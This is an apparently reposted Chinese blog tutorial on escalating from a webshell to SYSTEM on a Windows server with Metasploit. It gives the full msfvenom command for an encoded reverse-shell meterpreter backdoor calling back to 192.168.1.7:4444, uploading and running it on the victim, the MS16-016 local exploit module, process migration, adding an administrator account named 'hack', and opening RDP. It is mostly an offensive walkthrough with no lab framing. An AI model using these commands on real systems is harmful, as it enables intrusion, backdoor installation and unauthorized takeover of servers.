• 渗透之——MSF提权


    在WEB渗透中当我们拿到webshell了,我们可以试试用MSF(metasploit)来进行提权,在MSF里meterpreter很强大的!

    我们先用msfvenom生成一个EXE的木马后门。

    msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b 'x00' LHOST=192.168.1.7 LPORT=4444 -f exe > abc.exe

    然后在到MSF根据刚才配置的木马后门进行监听...

    然后在把木马上传到服务器(受害者)的机器里,必须上传到可读可写的目录下

    比如这里我吧abc.exe上传到了C:usersleakdesktop目录下,

    abc.exe就是我刚才生成的后门。

    然后在执行我们的后门,可以看见MSF弹回了一个session 1(会话连接)。

    说明我们后门程序成功执行起来了,当然你也可以在webshell执行的,

    但必须的有一点执行的权限

    getuid //可以看见我们的权限很低的,一般都是user权限的,

    但也遇到过某些服务器执行后就直接是system最高权限。像这种我们就直接加用户啦。

    这里我们是user权限,我们要把它提升到system权限。Windows最高权限

    接着我们输入命令

    background //把你当前的metasploit shell转为后台执行。

    search ms16 // 搜索关键字相关的漏洞

    .....然后我选择了MS16-016这个漏洞在进行提权

    use exploit/windows/local/ms16_016_webdav // 选择漏洞
    ————————————————

    show options  //查看漏洞里边要设置的参数

    可以看见只有一个SESSION参数要设置 

    set  SESSION 1 // 设置会刚才我们后门连接的ID号 1

    exploit //执行提权...

    可以看见成功的吧漏洞利用到了PID为692的进程中...

    虽然提权成功了 但你getuid下还是看见的是user权限

    ps一下查看进程

    根据刚才的提示找到PID 692的进程

    可以看见确实是system权限

    所以我们还要用到migrate 命令 //迁移到一个指定的进程ID。

    migrate 692  //

    在getuid下可以看见为system权限啦

    提权成功了

    既然有了system权限 那我们在添加账号hack

    添加为管理员组

    用Nmap扫下并没有开启远程登陆3389

    run getgui -e  //开启目标主机3389  貌似这条MSF命令只对2003的系统有效 执行几次都没成功 

    所以就用cmd命令开了3389端口

    提权成功,登录服务器。。。

    版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

    本文链接:https://blog.csdn.net/l1028386804/article/details/85954288
    ————————————————

  • 相关阅读:
    Sql获取表中随机1到n条数据
    SQLite相关
    Eclipse自动生成api时报错“警告: 编码 GBK 的不可映射字符”
    Git基础命令
    Oracle查询结果行转列,列转行
    字符串编码方式转换
    Java字符串匹配正则表达式
    python爬虫--编码问题y
    GET与POST方法
    python爬虫(1)--Urllib库的基本使用
  • 原文地址:https://www.cnblogs.com/wjw-zm/p/11664521.html
Copyright © 2020-2023  润新知